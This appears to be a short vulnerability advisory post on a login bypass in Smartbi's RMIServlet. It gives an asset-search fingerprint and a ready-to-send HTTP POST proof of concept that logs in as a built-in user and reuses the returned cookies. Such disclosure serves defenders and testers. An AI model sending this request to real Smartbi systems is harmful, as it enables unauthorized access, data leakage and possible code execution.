Smartbi Rmiservlet Login Bypass Vulnerability
Smartbi Rmiservlet Login Bypass Vulnerability
smartbi RMIServlet login bypass vulnerability
Vulnerability Description
Smartbi will have several users built-in when installing. When using a specific interface, it can bypass the user identity authentication mechanism to obtain their identity credentials, and then use the acquired identity credentials to call the background interface, which may lead to sensitive information leakage and code execution.
Vulnerability Impact
- smartbi
Network surveying and mapping
app=”SMARTBI”
Vulnerability reappears
Product Page
Verify POC
1
2
3
4
5
6
POST /vision/RMIServlet HTTP/1.1
Host:
Accept: */*
Content-Type: application/x-www-form-urlencoded
className=UserService&methodName=loginFromDB¶ms=["service","0a"]
Log in via the obtained cookies
This post is licensed under CC BY 4.0 by the author.